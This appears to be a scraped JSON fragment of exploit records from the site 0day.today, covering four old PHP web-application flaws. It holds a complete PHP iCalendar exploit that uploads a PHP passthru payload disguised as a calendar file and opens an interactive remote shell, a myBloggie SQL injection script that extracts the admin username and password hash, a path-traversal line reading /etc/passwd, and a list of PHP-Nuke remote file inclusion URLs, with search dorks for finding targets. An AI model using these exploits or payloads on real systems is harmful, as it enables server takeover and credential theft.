"published": "2008-09-21T00:00:00", "id": "1337DAY-ID-3714", "href": "https://0day.today/exploit/description/3714", "type": "zdt", "title": "PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit", "sourceData": "=================================================================\r\nPHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit\r\n=================================================================\r\n\r\n\r\n<?php\r\n\r\n/*\r\n\t-----------------------------------------------------------------\r\n\tPHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit\r\n\t-----------------------------------------------------------------\r\n\t\r\n\tauthor...: EgiX\r\n\r\n\tlink.....: http://phpicalendar.net/\r\n\tdork.....: \"Powered by PHP iCalendar\"\r\n\t\r\n\t[-] vulnerable code in /admin/index.php\r\n\t\r\n\t65.\t// Add or Update a calendar\r\n\t66.\t$addupdate_msg \t= '';\r\n\t67.\tif ((isset($_POST['action'])) && ($_POST['action'] == 'addupdate')) {\r\n\t68.\t\tfor ($filenumber = 1; $filenumber < 6; $filenumber++) {\r\n\t69.\t\t\t$file = $_FILES['calfile'];\r\n\t70.\t\t\t$addupdate_success = FALSE;\r\n\t71.\t\r\n\t72.\t\t\tif (!is_uploaded_file_v4($file['tmp_name'][$filenumber])) {\r\n\t73.\t\t\t\t$upload_error = get_upload_error($file['error'][$filenumber]);\r\n\t74.\t\t\t} elseif (!is_uploaded_ics($file['name'][$filenumber])) {\r\n\t75.\t\t\t\t$upload_error = $upload_error_type_lang;\r\n\t76.\t\t\t} elseif (!copy_cal($file['tmp_name'][$filenumber], $file['name'][$filenumber])) {\r\n\t77.\t\t\t\t$upload_error = $copy_error_lang . \" \" . $file['tmp_name'][$filenumber] . \" - \" . $calendar_path . \"/\" . $file['name'][$filenumber];\r\n\t78.\t\t\t} else {\r\n\t79.\t\t\t\t$addupdate_success = TRUE;\r\n\t80.\t\t\t}\r\n\t81.\t\t\t\r\n\t82.\t\t\tif ($addupdate_success == TRUE) {\r\n\t83.\t\t\t\t$addupdate_msg = $addupdate_msg . '<font color=\"green\">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'</font><br />';\r\n\t84.\t\t\t} else {\r\n\t85.\t\t\t\t$addupdate_msg = $addupdate_msg . '<font color=\"red\">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'</font><br />';\r\n\t86.\t\t\t}\r\n\t87.\t\t}\r\n\t88.\t}\r\n\t\r\n\trestricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file\r\n\t(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally\r\n\trecognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the\r\n\tsame LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n\t$sock = fsockopen($host, 80);\r\n\twhile (!$sock)\r\n\t{\r\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\r\n\t\t$sock = fsockopen($host, 80);\r\n\t}\r\n\tfputs($sock, $packet);\r\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\r\n\tfclose($sock);\r\n\treturn $resp;\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------------------------+\";\r\nprint \"\\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n\tprint \"\\nUsage......: php $argv[0] host path\\n\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /\";\r\n\tprint \"\\nExample....: php $argv[0] localhost /phpicalendar/\\n\";\r\n\tdie();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\n\";\r\n$payload .= \"addupdate\\r\\n\";\r\n$payload .= \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"calfile[1]\\\"; filename=\\\"fake_cal.ics\\\"\\r\\n\\r\\n\";\r\n$payload .= \"BEGIN:VCALENDAR\\n<?php \\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${die()} ?>\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n\r\n$packet = \"POST {$path}admin/index.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n$packet .= $payload;\r\n\t\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}preferences.php?action=setcookie HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\npreg_match(\"/Set-Cookie: (phpicalendar_[^=]*)=/\", http_send($host, $packet), $cookie);\r\n\r\n$data = urlencode(serialize(array(\"cookie_language\" => \"../calendars/fake_cal.ics\".chr(0))));\r\n\r\nwhile(1)\r\n{\r\n\tprint \"\\nphpicalendar-shell# \";\r\n\t$cmd = trim(fgets(STDIN));\r\n\tif ($cmd != \"exit\")\r\n\t{\r\n\t\t$packet = \"GET {$path}print.php HTTP/1.0\\r\\n\";\r\n\t\t$packet .= \"Host: {$host}\\r\\n\";\r\n\t\t$packet .= \"Cookie: {$cookie[1]}={$data}\\r\\n\";\r\n\t\t$packet .= \"Cmd: \".base64_encode($cmd).\"\\r\\n\";\r\n\t\t$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\t\t$output = http_send($host, $packet);\r\n\t\t$shell = explode(\"_code_\", $output);\r\n\t\tpreg_match(\"/_code_/\", $output) ? print \"\\n{$shell[1]}\" : die(\"\\n[-] Exploit failed...\\n\");\r\n\t}\r\n\telse break;\r\n}\r\n\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3714"}, {"lastseen": "2018-02-14T00:30:23", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-21T00:00:00", "published": "2008-09-21T00:00:00", "id": "1337DAY-ID-3715", "href": "https://0day.today/exploit/description/3715", "type": "zdt", "title": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability", "sourceData": "===================================================================\r\n6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability\r\n===================================================================\r\n\r\n\r\n|___________________________________________________|\r\n|\r\n| 6rbScript V3.3 Local file Vulnerability\r\n|\r\n|___________________________________________________\r\n| |\r\n|\r\n| script : www.6rbscript.com\r\n|\r\n| DorK : inurl:\"section.php?name=singers\"\r\n| dorK : Powered By 6rbScript V3.3\r\n|___________________________________________________|\r\n \r\nAuthor : Stack\r\n \r\nExpl need magic quote = off & open basdir = off in many server\r\n \r\nsite.il/section.php?name=../../../../etc/passwd\r\n\r\n\r\n\n# 0day.today [2018-02-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3715"}, {"lastseen": "2018-01-06T09:06:47", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-08-07T00:00:00", "published": "2006-08-07T00:00:00", "id": "1337DAY-ID-640", "href": "https://0day.today/exploit/description/640", "type": "zdt", "title": "myBloggie <= 2.1.4 (trackback.php) Multiple SQL Injections Exploit", "sourceData": "==================================================================\r\nmyBloggie <= 2.1.4 (trackback.php) Multiple SQL Injections Exploit\r\n==================================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/php -q -d short_open_tag=on\r\n<?\r\necho \"MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\\n\";\r\necho \"administrative credentials disclosure exploit\\n\";\r\n\r\n\r\n/*\r\nworks regardless of php.ini settings\r\nagainst MySQL >= 4.1 (allowing subs)\r\n*/\r\n\r\nif ($argc<3) {\r\necho \"Usage: php \".$argv[0].\" host path OPTIONS\\n\";\r\necho \"host: target server (ip/hostname)\\n\";\r\necho \"path: path to MyBloggie\\n\";\r\necho \"Options:\\n\";\r\necho \" -i specify an existent post id (default: 1)\\n\";\r\necho \" -T[prefix] specify a table prefix different from default (mb_)\\n\";\r\necho \" -p[port]: specify a port other than 80\\n\";\r\necho \" -P[ip:port]: specify a proxy\\n\";\r\necho \" -d: disclose table prefix (reccomended)\\n\";\r\necho \"Example:\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /MyBloggie/ -d -i7\\r\\n\";\r\necho \"php \".$argv[0].\" localhost /MyBloggie/ -Tm_\\r\\n\";\r\ndie;\r\n}\r\n\r\n/* software site: http://mybloggie.mywebland.com/\r\n\r\n vulnerable code in trackback.php:\r\n\r\n...\r\nif(!empty($_REQUEST['title'])) {\r\n$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));\r\n}\r\nelse { $tback->trackback_reply(1, \"<p>Sorry, Trackback failed.. Reason : No title</p>\"); }\r\n\r\nif(!empty($_REQUEST['url'])) {\r\n$url=urldecode($_REQUEST['url']);\r\n\r\nif (validate_url($url)==false) { $tback->trackback_reply(1, \"<p>Sorry, Trackback failed.. Reason : URL not valid</p>\"); }\r\n}\r\nelse { $tback->trackback_reply(1, \"<p>Sorry, Trackback failed.. Reason : No URL</p>\"); }\r\n\r\nif(!empty($_REQUEST['excerpt']))\r\n {\r\n $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));\r\n } else {\r\n $tback->trackback_reply(1, \"<p>Sorry, Trackback failed.. Reason : No Excerpt</p>\");\r\n }\r\n\r\n// The blog name\r\nif(!empty($_REQUEST['blog_name']))\r\n {\r\n $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));\r\n } else\r\n {\r\n $blog_name=\"No Blog Name\";\r\n }\r\n\r\n$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),\r\n gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),\r\n gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));\r\n\r\n$sql = \"INSERT INTO \".COMMENT_TBL.\" SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,\r\n poster = '$blog_name', home='$url', comment_type='trackback'\";\r\n\r\n$result = $db->sql_query($sql) or die(\"Cannot query the database.<br>\" . mysql_error());\r\n...\r\n\r\nyou have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument\r\nwith MySQL >= 4.1 that allows SELECT subqueries for INSERT...\r\n\r\nso you can insert admin username & password hash inside comments and you will see them at screen\r\nalso arguments are passed to urldecode(), so you can bypass magic_quotes_gpc\r\nwith '%2527' sequence for the single quote char\r\nadn you can disclose table prefix going to:\r\n\r\nhttp://192.168.1.3/mybloggie/index.php?mode=viewdate\r\n\r\nyou will have an error that disloses a query fragment\r\n\r\n-\r\n\r\nex., injecting code in 'title' argument, query becomes:\r\n\r\nINSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('<!--',password,'-->')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,\r\nposter = 'whatever', home='http://www.suntzu.org', comment_type='trackback'\r\n\t\t\t\t\t\t\t\t\t */\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n }\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n #debug\r\n #echo \"\\r\\n\".$html;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$prefix=\"mb_\";\r\n$post_id=\"1\";//admin\r\n$proxy=\"\";\r\n$dt=0;\r\n\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-i\")\r\n{\r\n $post_id=(int) str_replace(\"-i\",\"\",$argv[$i]);\r\n echo \"post id -> \".$post_id.\"\\n\";\r\n}\r\nif ($temp==\"-d\")\r\n{\r\n $dt=1;\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\nif ($dt)\r\n{\r\n$packet =\"GET \".$p.\"index.php?mode=viewdate HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\nif (strstr($html,\"You have an error in your SQL syntax\"))\r\n{\r\n $temp=explode(\"UNIXTIME(\",$html);\r\n $temp2=explode(\"posts.timest\",$temp[1]);\r\n $prefix=$temp2[0];\r\n echo \"table prefix -> \".$prefix.\"\\n\";\r\n}\r\n}\r\n\r\n$sql=\"%2527,comments=(SELECT CONCAT(%2527<!--%2527,password,%2527-->%2527)FROM \".$prefix.\"user)/*\";\r\n//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '<!--' but hash will be clearly visible in comments\r\n$data=\"title=hi\".$sql;\r\n$data.=\"&url=http%3a%2f%2fwww%2esuntzu%2eorg\";\r\n$data.=\"&excerpt=whatever\";\r\n$data.=\"&blog_name=whatever\";\r\n$packet =\"POST \".$p.\"trackback.php/$post_id HTTP/1.0\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n\r\n$sql=\"%2527,comments=(SELECT CONCAT(%2527<!--%2527,user,%2527-->%2527)FROM \".$prefix.\"user)/*\";\r\n$data=\"title=hi\".$sql;\r\n$data.=\"&url=http%3a%2f%2fwww%2esuntzu%2eorg\";\r\n$data.=\"&excerpt=whatever\";\r\n$data.=\"&blog_name=whatever\";\r\n$packet =\"POST \".$p.\"trackback.php/$post_id HTTP/1.0\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\nsleep(1);\r\n\r\n$packet =\"GET \".$p.\"index.php?mode=viewid&post_id=$post_id HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nsendpacketii($packet);\r\n//echo $html;\r\n$temp=explode('\"message\"><!--',$html);\r\nfor ($i=1; $i<count($temp); $i++)\r\n{\r\n$temp2=explode(\"-->\",$temp[$i]);\r\nif (is_hash($temp2[0]))\r\n{\r\n $hash=$temp2[0];\r\n $temp2=explode(\"-->\",$temp[$i+1]);\r\n $admin=$temp2[0];\r\n echo \"----------------------------------------------------------------\\n\";\r\n echo \"admin -> \".$admin.\"\\n\";\r\n echo \"password (md5) -> \".$hash.\"\\n\";\r\n echo \"----------------------------------------------------------------\\n\";\r\n die();\r\n}\r\n}\r\n//if you are here...\r\necho \"exploit failed...\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/640"}, {"lastseen": "2018-03-13T01:15:13", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-06-02T00:00:00", "published": "2006-06-02T00:00:00", "id": "1337DAY-ID-480", "href": "https://0day.today/exploit/description/480", "type": "zdt", "title": "PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions", "sourceData": "==============================================================\r\nPHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions\r\n==============================================================\r\n\r\n\r\n\r\n# Milli-Harekat Advisory ( www.milli-harekat.org )\r\n# PHP-Nuke <= All version - Remote File Include Vulnerabilities\r\n# Risk : High\r\n# Class: Remote\r\n# Script : PHP NUKE ALL VERSION\r\n# Credits : ERNE\r\n# Thanks : Dj_ReMix,Eskobar,TR_IP,?y KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS\r\n# Vulnerable :\r\n\r\nhttp://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\r\nhttp://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/480"}]}
